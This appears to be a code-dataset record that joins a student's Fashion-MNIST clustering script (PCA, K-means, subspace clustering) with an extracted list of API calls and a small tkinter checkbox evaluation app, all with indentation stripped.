labels = np.unique(y)
X_processed= X.copy()
for l in labels:
mean = np.average(X_processed[y == l], 0)
X_processed[y == l] = X_processed[y == l]- mean
return X_processed
def q_a(X,y):
#Run PCA on the dataset and plot the projection on the first 2 principal components, with each class marked in a different color/symbol
X_train_processed = preprocess_substract_mean(X, y)
pca = PCA(2) # project from 64 to 2 dimensions
projected = pca.fit_transform(X_train_processed)
#print(X_train_processed)
#print(projected.shape)
plt.scatter(projected[:, 0], projected[:, 1],
c=y_train, edgecolor='none', alpha=0.5,
cmap=plt.cm.get_cmap('tab10', 10))
plt.xlabel('component 1')
plt.ylabel('component 2')
# plt.colorbar();
plt.show()
q_a(X_train,y_train)
def angle_calucalte(p1, p2):
p1_u = p1 / np.linalg.norm(p1)
p2_u = p2 / np.linalg.norm(p2)
return (np.arccos(np.clip(np.dot(p1_u, p2_u), -1.0, 1.0)))
def q_b(X,y):
# Sample at least 5000 pairs of points from the same class and 5000 pairs of points from different classes,
labels = np.unique(y)
n=5000
cos_theta_in_all = np.empty( shape=(0, 0) )
cos_theta_out_all = np.empty( shape=(0, 0) )
num_labels = len(labels)
rand_indx1 = random.choices(range(len(X)), k=int(n))
rand_indx2 = list(pd.Series(rand_indx1).apply(lambda x: random.choices(Y.index[Y ==Y[x]])))
rand_indx2 = [j[0] for j in rand_indx2]
rand_indx3 = list(pd.Series(rand_indx1).apply(lambda x: random.choices(Y.index[Y !=Y[x]])))
rand_indx3 = [j[0] for j in rand_indx3]
points_in_1 = X_train.iloc[rand_indx1,:]
points_in_2 = X_train.iloc[rand_indx2,:]
points_out_1 = X_train.iloc[rand_indx3,:]
#compute the angle between every pair of points
theta_in_all = [angle_calucalte(points_in_1.iloc[i,:],points_in_2.iloc[i,:]) for i in range(len(points_in_1))]
theta_out_all = [angle_calucalte(points_in_1.iloc[i,:],points_out_1.iloc[i,:]) for i in range(len(points_in_1))]
# Plot the distribution of between-cluster angles and within cluster angles.
sns.distplot(theta_in_all,hist=True)
sns.distplot(theta_out_all,hist=True)
plt.legend(labels=['theta in', 'theta out'])
plt.show()
q_b(X_train,y_train)
l=5
pca = PCA()
pca.fit_transform(X_train)
#print(pca.explained_variance_ratio_.round(3))
np.cumsum(pca.explained_variance_ratio_).round(3)
def q_c(X,y):
# Perform PCA for each class separately, and plot for each class the proportion of variance explained vs the number of components ordered from the first PC until the last.
# What number of components would you take for further analysis?
labels = np.unique(y)
#fig1, ax1 = plt.subplots()
fig2, ax2 = plt.subplots()
for l in labels:
pca = PCA()
pca.fit_transform(X[y==l])
exp_var_ratio = pca.explained_variance_ratio_
#ax1.plot(exp_var_ratio,label=f'class {l}')
ax2.plot(np.cumsum(pca.explained_variance_ratio_),label=f'class {l}')
#ax1.set_title("Explained Variance per class")
ax2.set_title("Cumulated Explained Variance per class")
#ax1.legend()
ax2.legend()
#fig1.show()
fig2.show()
# Repeat but now with PCA for the entire dataset
#fig3, ax3 = plt.subplots()
fig4, ax4 = plt.subplots()
pca = PCA()
projected = pca.fit_transform(X)
exp_var_ratio = pca.explained_variance_ratio_
#x3.plot(exp_var_ratio)
ax4.plot(np.cumsum(exp_var_ratio))
#ax3.set_title("Explained Variance Global")
ax4.set_title("Cumulated Explained Variance Global")
#fig3.show()
fig4.show()
q_c(X_train,Y_train)
#What number of components would you take for further analysis?
pca = PCA(0.9)
pca.fit_transform(X_train)
print(f"The number of components necessary to explain 90% of the data is : {pca.n_components_}")
def performance_measure2(k,cluster1,cluster2):
data = {'cluster1': cluster1,'cluster2': cluster2}
clusters = pd.DataFrame(data, index=range(len(cluster1)))
all_per = list(it.permutations(range(k)))
accuracy_rate_all_per = np.zeros(len(all_per))
for l, per in enumerate(all_per) :
c = [i for i in range(k)]
dic = dict(zip(c,per))
clusters['premut_cluster'] = clusters['cluster2'].transform(lambda x: dic[x] if x in dic else None)
m = clusters.groupby(['cluster1','premut_cluster']).size().unstack(fill_value=0)
accuracy_rate_all_per[l]=np.trace(m)
cost_cluster = (accuracy_rate_all_per.max())/len(cluster1)
return (cost_cluster)
def performance_measure3(cluster1,cluster2):
data = {'cluster1': cluster1,'cluster2': cluster2}
clusters = pd.DataFrame(data, index=range(len(cluster1)))
m = -1*np.array(clusters.groupby(['cluster1','cluster2']).size().unstack(fill_value=0))
indx, per = linear_sum_assignment(m)
cost_cluster = -m[indx,per].sum()/len(clusters)
return (cost_cluster)
num_components = 85
pca =PCA(num_components)
pca_X =pca.fit_transform(X_train)
kmeans_after_PCA = KMeans(n_clusters=10).fit(pca_X)
kmeans_after_PCA.labels_
a,b
def q_d(X,y):
#Run the following algorithms on your dataset:
#For each algorithm, compute and report the clustering accuracy from eq. (6). Explain your results.
labels = np.unique(y)
K=10
#i. K-means with K = 10
kmeans = KMeans(n_clusters=K).fit(X)
kmeans_acc = performance_measure2(K,Y_train,kmeans.labels_)
#ii. PCA with the number of components chosen based on (c.), followed by K-means with K = 10 on the projection to the top components.
num_components = PCA(0.9).n_components_
pca =PCA(num_components)
pca_X =pca.fit_transform(X)
kmeans_after_PCA = KMeans(n_clusters=K).fit(pca_X)
kmeans_after_PCA.labels_
kmeans_pca_acc = performance_measure2(K,Y_train,kmeans_after_PCA.labels_)
#iii. A subspace clustering algorithm of your choice (ENsc), where you can set the number of clusters to the correct one, 10.
model_ensc = ElasticNetSubspaceClustering(n_clusters=K, algorithm='spams', gamma=500)
ensc_acc = performance_measure2(K,Y_train,model_ensc.fit(X).lables_)
print(f'kmeans acc is: {kmeans_acc} , pca followed by kmeans acc is : {kmeans_pca_acc}, ensc acc is {ensc_acc}')
q_d(X_train,y_train)
def main():
#X_train, y_train = load_mnist('data/fashion', kind='train')
#X_test, y_test = load_mnist('data/fashion', kind='t10k')
train_data = pd.read_csv('fashion-mnist_train.csv')
X_train = train_data.drop('label', axis=1)
y_train = train_data['label']
#X_train =X_train.astype(np.uint)
#y_train =y_train.astype(np.uint)
#X_test = X_test.astype(np.uint)
#y_test = y_test.astype(np.uint)
q_a(X_train, y_train)
q_b(X_train, y_train)
q_c(X_train, y_train)
q_d(X_train, y_train)
if __name__ == '__main__':
main()
| [
"numpy.trace",
"pandas.read_csv",
"matplotlib.pyplot.ylabel",
"sklearn.neighbors.kneighbors_graph",
"random.choices",
"numpy.linalg.norm",
"sklearn.decomposition.sparse_encode",
"numpy.arange",
"sklearn.cluster.k_means",
"seaborn.distplot",
"sklearn.decomposition.PCA",
"matplotlib.pyplot.xlabe... | [((15196, 15201), 'sklearn.decomposition.PCA', 'PCA', ([], {}), '()\n', (15199, 15201), False, 'from sklearn.decomposition import PCA\n'), ((16649, 16657), 'sklearn.decomposition.PCA', 'PCA', (['(0.9)'], {}), '(0.9)\n', (16652, 16657), False, 'from sklearn.decomposition import PCA\n'), ((17838, 17857), 'sklearn.decomposition.PCA', 'PCA', (['num_components'], {}), '(num_components)\n', (17841, 17857), False, 'from sklearn.decomposition import PCA\n'), ((5622, 5641), 'numpy.zeros', 'np.zeros', (['n_samples'], {}), '(n_samples)\n', (5630, 5641), True, 'import numpy as np\n'), ((6214, 6245), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {}), '(n_samples * n_nonzero)\n', (6222, 6245), True, 'import numpy as np\n'), ((6257, 6288), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {}), '(n_samples * n_nonzero)\n', (6265, 6288), True, 'import numpy as np\n'), ((6300, 6331), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {}), '(n_samples * n_nonzero)\n', (6308, 6331), True, 'import numpy as np\n'), ((8066, 8135), 'scipy.sparse.csr_matrix', 'sparse.csr_matrix', (['(vals, (rows, cols))'], {'shape': '(n_samples, n_samples)'}), '((vals, (rows, cols)), shape=(n_samples, n_samples))\n', (8083, 8135), False, 'from scipy import sparse\n'), ((9356, 9398), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {'dtype': 'int'}), '(n_samples * n_nonzero, dtype=int)\n', (9364, 9398), True, 'import numpy as np\n'), ((9412, 9454), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {'dtype': 'int'}), '(n_samples * n_nonzero, dtype=int)\n', (9420, 9454), True, 'import numpy as np\n'), ((9468, 9499), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {}), '(n_samples * n_nonzero)\n', (9476, 9499), True, 'import numpy as np\n'), ((10749, 10818), 'scipy.sparse.csr_matrix', 'sparse.csr_matrix', (['(vals, (rows, cols))'], {'shape': '(n_samples, n_samples)'}), '((vals, (rows, cols)), shape=(n_samples, n_samples))\n', (10766, 10818), False, 'from scipy import sparse\n'), ((12777, 12791), 'google.colab.files.upload', 'files.upload', ([], {}), '()\n', (12789, 12791), False, 'from google.colab import files\n'), ((12879, 12891), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (12888, 12891), True, 'import numpy as np\n'), ((13286, 13292), 'sklearn.decomposition.PCA', 'PCA', (['(2)'], {}), '(2)\n', (13289, 13292), False, 'from sklearn.decomposition import PCA\n'), ((13600, 13625), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""component 1"""'], {}), "('component 1')\n", (13610, 13625), True, 'import matplotlib.pyplot as plt\n'), ((13630, 13655), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""component 2"""'], {}), "('component 2')\n", (13640, 13655), True, 'import matplotlib.pyplot as plt\n'), ((13682, 13692), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (13690, 13692), True, 'import matplotlib.pyplot as plt\n'), ((14023, 14035), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (14032, 14035), True, 'import numpy as np\n'), ((14070, 14092), 'numpy.empty', 'np.empty', ([], {'shape': '(0, 0)'}), '(shape=(0, 0))\n', (14078, 14092), True, 'import numpy as np\n'), ((14119, 14141), 'numpy.empty', 'np.empty', ([], {'shape': '(0, 0)'}), '(shape=(0, 0))\n', (14127, 14141), True, 'import numpy as np\n'), ((15016, 15053), 'seaborn.distplot', 'sns.distplot', (['theta_in_all'], {'hist': '(True)'}), '(theta_in_all, hist=True)\n', (15028, 15053), True, 'import seaborn as sns\n'), ((15057, 15095), 'seaborn.distplot', 'sns.distplot', (['theta_out_all'], {'hist': '(True)'}), '(theta_out_all, hist=True)\n', (15069, 15095), True, 'import seaborn as sns\n'), ((15099, 15143), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'labels': "['theta in', 'theta out']"}), "(labels=['theta in', 'theta out'])\n", (15109, 15143), True, 'import matplotlib.pyplot as plt\n'), ((15148, 15158), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (15156, 15158), True, 'import matplotlib.pyplot as plt\n'), ((15606, 15618), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (15615, 15618), True, 'import numpy as np\n'), ((15667, 15681), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (15679, 15681), True, 'import matplotlib.pyplot as plt\n'), ((16224, 16238), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (16236, 16238), True, 'import matplotlib.pyplot as plt\n'), ((16249, 16254), 'sklearn.decomposition.PCA', 'PCA', ([], {}), '()\n', (16252, 16254), False, 'from sklearn.decomposition import PCA\n'), ((18164, 18176), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (18173, 18176), True, 'import numpy as np\n'), ((18522, 18541), 'sklearn.decomposition.PCA', 'PCA', (['num_components'], {}), '(num_components)\n', (18525, 18541), False, 'from sklearn.decomposition import PCA\n'), ((19330, 19368), 'pandas.read_csv', 'pd.read_csv', (['"""fashion-mnist_train.csv"""'], {}), "('fashion-mnist_train.csv')\n", (19341, 19368), True, 'import pandas as pd\n'), ((1406, 1475), 'sklearn.utils.check_array', 'check_array', (['X'], {'accept_sparse': "['csr', 'csc', 'coo']", 'dtype': 'np.float64'}), "(X, accept_sparse=['csr', 'csc', 'coo'], dtype=np.float64)\n", (1417, 1475), False, 'from sklearn.utils import check_random_state, check_array, check_symmetric\n'), ((1496, 1507), 'time.time', 'time.time', ([], {}), '()\n', (1505, 1507), False, 'import time\n'), ((1844, 1913), 'sklearn.utils.check_array', 'check_array', (['X'], {'accept_sparse': "['csr', 'csc', 'coo']", 'dtype': 'np.float64'}), "(X, accept_sparse=['csr', 'csc', 'coo'], dtype=np.float64)\n", (1855, 1913), False, 'from sklearn.utils import check_random_state, check_array, check_symmetric\n'), ((1934, 1945), 'time.time', 'time.time', ([], {}), '()\n', (1943, 1945), False, 'import time\n'), ((2175, 2219), 'sklearn.preprocessing.normalize', 'normalize', (['self.representation_matrix_', '"""l2"""'], {}), "(self.representation_matrix_, 'l2')\n", (2184, 2219), False, 'from sklearn.preprocessing import normalize\n'), ((2767, 2805), 'sklearn.utils.check_symmetric', 'check_symmetric', (['self.affinity_matrix_'], {}), '(self.affinity_matrix_)\n', (2782, 2805), False, 'from sklearn.utils import check_random_state, check_array, check_symmetric\n'), ((2829, 2866), 'sklearn.utils.check_random_state', 'check_random_state', (['self.random_state'], {}), '(self.random_state)\n', (2847, 2866), False, 'from sklearn.utils import check_random_state, check_array, check_symmetric\n'), ((2896, 2951), 'scipy.sparse.csgraph.laplacian', 'sparse.csgraph.laplacian', (['affinity_matrix_'], {'normed': '(True)'}), '(affinity_matrix_, normed=True)\n', (2920, 2951), False, 'from scipy import sparse\n'), ((3139, 3153), 'sklearn.preprocessing.normalize', 'normalize', (['vec'], {}), '(vec)\n', (3148, 3153), False, 'from sklearn.preprocessing import normalize\n'), ((3183, 3277), 'sklearn.cluster.k_means', 'cluster.k_means', (['embedding', 'self.n_clusters'], {'random_state': 'random_state', 'n_init': 'self.n_init'}), '(embedding, self.n_clusters, random_state=random_state,\n n_init=self.n_init)\n', (3198, 3277), False, 'from sklearn import cluster\n'), ((3605, 3636), 'numpy.arange', 'np.arange', (['n_samples'], {'dtype': 'int'}), '(n_samples, dtype=int)\n', (3614, 3636), True, 'import numpy as np\n'), ((5569, 5608), 'numpy.concatenate', 'np.concatenate', (['[activesupp, addedsupp]'], {}), '([activesupp, addedsupp])\n', (5583, 5608), True, 'import numpy as np\n'), ((7447, 7464), 'numpy.flatnonzero', 'np.flatnonzero', (['c'], {}), '(c)\n', (7461, 7464), True, 'import numpy as np\n'), ((9679, 9707), 'numpy.empty', 'np.empty', ([], {'shape': '(0)', 'dtype': 'int'}), '(shape=0, dtype=int)\n', (9687, 9707), True, 'import numpy as np\n'), ((12166, 12190), 'numpy.fill_diagonal', 'np.fill_diagonal', (['D', '(0.0)'], {}), '(D, 0.0)\n', (12182, 12190), True, 'import numpy as np\n'), ((12954, 12988), 'numpy.average', 'np.average', (['X_processed[y == l]', '(0)'], {}), '(X_processed[y == l], 0)\n', (12964, 12988), True, 'import numpy as np\n'), ((13765, 13783), 'numpy.linalg.norm', 'np.linalg.norm', (['p1'], {}), '(p1)\n', (13779, 13783), True, 'import numpy as np\n'), ((13800, 13818), 'numpy.linalg.norm', 'np.linalg.norm', (['p2'], {}), '(p2)\n', (13814, 13818), True, 'import numpy as np\n'), ((15278, 15318), 'numpy.cumsum', 'np.cumsum', (['pca.explained_variance_ratio_'], {}), '(pca.explained_variance_ratio_)\n', (15287, 15318), True, 'import numpy as np\n'), ((15717, 15722), 'sklearn.decomposition.PCA', 'PCA', ([], {}), '()\n', (15720, 15722), False, 'from sklearn.decomposition import PCA\n'), ((16385, 16409), 'numpy.cumsum', 'np.cumsum', (['exp_var_ratio'], {}), '(exp_var_ratio)\n', (16394, 16409), True, 'import numpy as np\n'), ((17350, 17361), 'numpy.trace', 'np.trace', (['m'], {}), '(m)\n', (17358, 17361), True, 'import numpy as np\n'), ((17911, 17932), 'sklearn.cluster.KMeans', 'KMeans', ([], {'n_clusters': '(10)'}), '(n_clusters=10)\n', (17917, 17932), False, 'from sklearn.cluster import KMeans\n'), ((18490, 18498), 'sklearn.decomposition.PCA', 'PCA', (['(0.9)'], {}), '(0.9)\n', (18493, 18498), False, 'from sklearn.decomposition import PCA\n'), ((1596, 1607), 'time.time', 'time.time', ([], {}), '()\n', (1605, 1607), False, 'import time\n'), ((1735, 1746), 'time.time', 'time.time', ([], {}), '()\n', (1744, 1746), False, 'import time\n'), ((2034, 2045), 'time.time', 'time.time', ([], {}), '()\n', (2043, 2045), False, 'import time\n'), ((4436, 4490), 'sklearn.decomposition.sparse_encode', 'sparse_encode', (['y', 'Xs'], {'algorithm': 'algorithm', 'alpha': 'alpha'}), '(y, Xs, algorithm=algorithm, alpha=alpha)\n', (4449, 4490), False, 'from sklearn.decomposition import sparse_encode\n'), ((4871, 4906), 'numpy.nonzero', 'np.nonzero', (['(coherence > tau + 1e-10)'], {}), '(coherence > tau + 1e-10)\n', (4881, 4906), True, 'import numpy as np\n'), ((9762, 9785), 'numpy.linalg.norm', 'np.linalg.norm', (['X[i, :]'], {}), '(X[i, :])\n', (9776, 9785), True, 'import numpy as np\n'), ((11525, 11542), 'numpy.matmul', 'np.matmul', (['X', 'X.T'], {}), '(X, X.T)\n', (11534, 11542), True, 'import numpy as np\n'), ((13566, 13594), 'matplotlib.pyplot.cm.get_cmap', 'plt.cm.get_cmap', (['"""tab10"""', '(10)'], {}), "('tab10', 10)\n", (13581, 13594), True, 'import matplotlib.pyplot as plt\n'), ((13849, 13867), 'numpy.dot', 'np.dot', (['p1_u', 'p2_u'], {}), '(p1_u, p2_u)\n', (13855, 13867), True, 'import numpy as np\n'), ((15882, 15922), 'numpy.cumsum', 'np.cumsum', (['pca.explained_variance_ratio_'], {}), '(pca.explained_variance_ratio_)\n', (15891, 15922), True, 'import numpy as np\n'), ((18228, 18248), 'sklearn.cluster.KMeans', 'KMeans', ([], {'n_clusters': 'K'}), '(n_clusters=K)\n', (18234, 18248), False, 'from sklearn.cluster import KMeans\n'), ((18597, 18617), 'sklearn.cluster.KMeans', 'KMeans', ([], {'n_clusters': 'K'}), '(n_clusters=K)\n', (18603, 18617), False, 'from sklearn.cluster import KMeans\n'), ((2485, 2584), 'sklearn.neighbors.kneighbors_graph', 'kneighbors_graph', (['normalized_representation_matrix_', '(3)'], {'mode': '"""connectivity"""', 'include_self': '(False)'}), "(normalized_representation_matrix_, 3, mode='connectivity',\n include_self=False)\n", (2501, 2584), False, 'from sklearn.neighbors import kneighbors_graph\n'), ((2989, 3024), 'scipy.sparse.identity', 'sparse.identity', (['laplacian.shape[0]'], {}), '(laplacian.shape[0])\n', (3004, 3024), False, 'from scipy import sparse\n'), ((3862, 3878), 'numpy.dot', 'np.dot', (['X', 'L2sol'], {}), '(X, L2sol)\n', (3868, 3878), True, 'import numpy as np\n'), ((4236, 4258), 'numpy.asfortranarray', 'np.asfortranarray', (['y.T'], {}), '(y.T)\n', (4253, 4258), True, 'import numpy as np\n'), ((4519, 4533), 'numpy.dot', 'np.dot', (['cs', 'Xs'], {}), '(cs, Xs)\n', (4525, 4533), True, 'import numpy as np\n'), ((4800, 4818), 'numpy.dot', 'np.dot', (['delta', 'X.T'], {}), '(delta, X.T)\n', (4806, 4818), True, 'import numpy as np\n'), ((5060, 5073), 'numpy.abs', 'np.abs', (['cs[0]'], {}), '(cs[0])\n', (5066, 5073), True, 'import numpy as np\n'), ((5401, 5471), 'numpy.argpartition', 'np.argpartition', (['(-coherence[addedsupp])', '(support_size - activesupp.size)'], {}), '(-coherence[addedsupp], support_size - activesupp.size)\n', (5416, 5471), True, 'import numpy as np\n'), ((9948, 9972), 'numpy.matmul', 'np.matmul', (['residual', 'X.T'], {}), '(residual, X.T)\n', (9957, 9972), True, 'import numpy as np\n'), ((10070, 10090), 'numpy.argmax', 'np.argmax', (['coherence'], {}), '(coherence)\n', (10079, 10090), True, 'import numpy as np\n'), ((10143, 10195), 'numpy.linalg.lstsq', 'np.linalg.lstsq', (['X[supp, :].T', 'X[i, :].T'], {'rcond': 'None'}), '(X[supp, :].T, X[i, :].T, rcond=None)\n', (10158, 10195), True, 'import numpy as np\n'), ((10264, 10290), 'numpy.matmul', 'np.matmul', (['c.T', 'X[supp, :]'], {}), '(c.T, X[supp, :])\n', (10273, 10290), True, 'import numpy as np\n'), ((10338, 10359), 'numpy.sum', 'np.sum', (['(residual ** 2)'], {}), '(residual ** 2)\n', (10344, 10359), True, 'import numpy as np\n'), ((11739, 11756), 'numpy.matmul', 'np.matmul', (['X', 'tmp'], {}), '(X, tmp)\n', (11748, 11756), True, 'import numpy as np\n'), ((11882, 11898), 'numpy.eye', 'np.eye', (['n_sample'], {}), '(n_sample)\n', (11888, 11898), True, 'import numpy as np\n'), ((12103, 12120), 'numpy.matmul', 'np.matmul', (['X', 'tmp'], {}), '(X, tmp)\n', (12112, 12120), True, 'import numpy as np\n'), ((14252, 14273), 'pandas.Series', 'pd.Series', (['rand_indx1'], {}), '(rand_indx1)\n', (14261, 14273), True, 'import pandas as pd\n'), ((14290, 14324), 'random.choices', 'random.choices', (['Y.index[Y == Y[x]]'], {}), '(Y.index[Y == Y[x]])\n', (14304, 14324), False, 'import random\n'), ((14392, 14413), 'pandas.Series', 'pd.Series', (['rand_indx1'], {}), '(rand_indx1)\n', (14401, 14413), True, 'import pandas as pd\n'), ((14430, 14464), 'random.choices', 'random.choices', (['Y.index[Y != Y[x]]'], {}), '(Y.index[Y != Y[x]])\n', (14444, 14464), False, 'import random\n'), ((2305, 2351), 'numpy.absolute', 'np.absolute', (['normalized_representation_matrix_'], {}), '(normalized_representation_matrix_)\n', (2316, 2351), True, 'import numpy as np\n'), ((2354, 2402), 'numpy.absolute', 'np.absolute', (['normalized_representation_matrix_.T'], {}), '(normalized_representation_matrix_.T)\n', (2365, 2402), True, 'import numpy as np\n'), ((3824, 3838), 'numpy.dot', 'np.dot', (['X.T', 'X'], {}), '(X.T, X)\n', (3830, 3838), True, 'import numpy as np\n'), ((4262, 4285), 'numpy.asfortranarray', 'np.asfortranarray', (['Xs.T'], {}), '(Xs.T)\n', (4279, 4285), True, 'import numpy as np\n'), ((4658, 4678), 'numpy.power', 'np.power', (['delta', '(2.0)'], {}), '(delta, 2.0)\n', (4666, 4678), True, 'import numpy as np\n'), ((6661, 6673), 'numpy.amax', 'np.amax', (['coh'], {}), '(coh)\n', (6668, 6673), True, 'import numpy as np\n'), ((11667, 11684), 'numpy.matmul', 'np.matmul', (['X.T', 'X'], {}), '(X.T, X)\n', (11676, 11684), True, 'import numpy as np\n'), ((11836, 11853), 'numpy.matmul', 'np.matmul', (['X', 'X.T'], {}), '(X, X.T)\n', (11845, 11853), True, 'import numpy as np\n'), ((12017, 12034), 'numpy.matmul', 'np.matmul', (['X.T', 'X'], {}), '(X.T, X)\n', (12026, 12034), True, 'import numpy as np\n'), ((3790, 3813), 'numpy.identity', 'np.identity', (['y.shape[1]'], {}), '(y.shape[1])\n', (3801, 3813), True, 'import numpy as np\n'), ((3921, 3931), 'numpy.abs', 'np.abs', (['c0'], {}), '(c0)\n', (3927, 3931), True, 'import numpy as np\n'), ((4573, 4586), 'numpy.abs', 'np.abs', (['cs[0]'], {}), '(cs[0])\n', (4579, 4586), True, 'import numpy as np\n'), ((4615, 4635), 'numpy.power', 'np.power', (['cs[0]', '(2.0)'], {}), '(cs[0], 2.0)\n', (4623, 4635), True, 'import numpy as np\n'), ((6616, 6630), 'numpy.dot', 'np.dot', (['X', 'y.T'], {}), '(X, y.T)\n', (6622, 6630), True, 'import numpy as np\n'), ((7049, 7071), 'numpy.asfortranarray', 'np.asfortranarray', (['y.T'], {}), '(y.T)\n', (7066, 7071), True, 'import numpy as np\n'), ((7283, 7336), 'sklearn.decomposition.sparse_encode', 'sparse_encode', (['y', 'X'], {'algorithm': 'algorithm', 'alpha': 'alpha'}), '(y, X, algorithm=algorithm, alpha=alpha)\n', (7296, 7336), False, 'from sklearn.decomposition import sparse_encode\n'), ((11687, 11705), 'numpy.eye', 'np.eye', (['n_features'], {}), '(n_features)\n', (11693, 11705), True, 'import numpy as np\n'), ((11856, 11872), 'numpy.eye', 'np.eye', (['n_sample'], {}), '(n_sample)\n', (11862, 11872), True, 'import numpy as np\n'), ((12037, 12055), 'numpy.eye', 'np.eye', (['n_features'], {}), '(n_features)\n', (12043, 12055), True, 'import numpy as np\n'), ((7075, 7097), 'numpy.asfortranarray', 'np.asfortranarray', (['X.T'], {}), '(X.T)\n', (7092, 7097), True, 'import numpy as np\n'), ((7642, 7663), 'numpy.absolute', 'np.absolute', (['c[index]'], {}), '(c[index])\n', (7653, 7663), True, 'import numpy as np\n'), ((11585, 11601), 'numpy.eye', 'np.eye', (['n_sample'], {}), '(n_sample)\n', (11591, 11601), True, 'import numpy as np\n'), ((4042, 4056), 'numpy.dot', 'np.dot', (['y', 'X.T'], {}), '(y, X.T)\n', (4048, 4056), True, 'import numpy as np\n')] |
from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar
from evaluator import Evaluator
class Win(Tk):
def __init__(self):
Tk.__init__(self, None, None)
self.wm_title('My first window')
self.evaluator = Evaluator()
self.label_var = StringVar()
Label(self, text="Result: ").pack()
#ASSIGNMENT13: add the textvariable property and set its value to self.label_var
Label(self, text = self.label_var).pack()
#ASSIGNMENT13: add the command property for the button and set its value to self.button_evaluate_handler
Button(self, text='Evaluate', command = self.button_evaluate_handler).pack()
self.__init__radio_buttons()
self.mainloop()
def __init__radio_buttons(self):
self.check_var_nev = IntVar()
self.check_var_rar = IntVar()
self.check_var_som = IntVar()
self.check_var_oft = IntVar()
self.check_var_v_oft = IntVar()
self.check_var_always = IntVar()
self.check_var_nev.set(0)
self.check_var_rar.set(0)
self.check_var_som.set(0)
self.check_var_oft.set(0)
self.check_var_v_oft.set(0)
self.check_var_always.set(0)
#ASSIGNMENT 13:
#for each write code IntVar above create a checkbox with attribute text
#Never, Rarely, Sometimes, Often, Very Often, Always
#and link the IntVar to the Checkbox variable attribute
self.check_nev = Checkbutton(self, text= 'Never', variable = self.check_var_nev)
self.check_rar = Checkbutton(self, text= 'Rarely', variable = self.check_var_rar)
self.check_som = Checkbutton(self, text= 'Sometimes', variable = self.check_var_som)
self.check_oft = Checkbutton(self, text= 'Often', variable = self.check_var_oft)
self.check_v_oft = Checkbutton(self, text= 'Very Often', variable = self.check_var_v_oft)
self.check_always = Checkbutton(self, text= 'Always', variable = self.check_var_always)
self.check_nev.pack()
self.check_rar.pack()
self.check_som.pack()
self.check_oft.pack()
self.check_v_oft.pack()
self.check_always.pack()
def button_evaluate_handler (self):
self.label_var.set(self.evaluator.faculty_evaluation_result(
0 if self.check_var_nev.get()== 0 else 1 ,
0 if self.check_var_rar.get()== 0 else 2,
0 if self.check_var_som.get()== 0 else 3,
0 if self.check_var_oft.get()== 0 else 25,
0 if self.check_var_v_oft.get()== 0 else 50,
0 if self.check_var_always.get()== 0 else 150))
| [
"tkinter.IntVar",
"tkinter.Checkbutton",
"evaluator.Evaluator",
"tkinter.Button",
"tkinter.StringVar",
"tkinter.Tk.__init__",
"tkinter.Label"
] | [((152, 181), 'tkinter.Tk.__init__', 'Tk.__init__', (['self', 'None', 'None'], {}), '(self, None, None)\n', (163, 181), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((248, 259), 'evaluator.Evaluator', 'Evaluator', ([], {}), '()\n', (257, 259), False, 'from evaluator import Evaluator\n'), ((285, 296), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (294, 296), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((826, 834), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (832, 834), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((864, 872), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (870, 872), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((902, 910), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (908, 910), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((940, 948), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (946, 948), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((980, 988), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (986, 988), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1021, 1029), 'tkinter.IntVar', 'IntVar', ([], {}), '()\n', (1027, 1029), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1495, 1555), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Never"""', 'variable': 'self.check_var_nev'}), "(self, text='Never', variable=self.check_var_nev)\n", (1506, 1555), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1584, 1645), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Rarely"""', 'variable': 'self.check_var_rar'}), "(self, text='Rarely', variable=self.check_var_rar)\n", (1595, 1645), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1674, 1738), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Sometimes"""', 'variable': 'self.check_var_som'}), "(self, text='Sometimes', variable=self.check_var_som)\n", (1685, 1738), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1767, 1827), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Often"""', 'variable': 'self.check_var_oft'}), "(self, text='Often', variable=self.check_var_oft)\n", (1778, 1827), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1858, 1925), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Very Often"""', 'variable': 'self.check_var_v_oft'}), "(self, text='Very Often', variable=self.check_var_v_oft)\n", (1869, 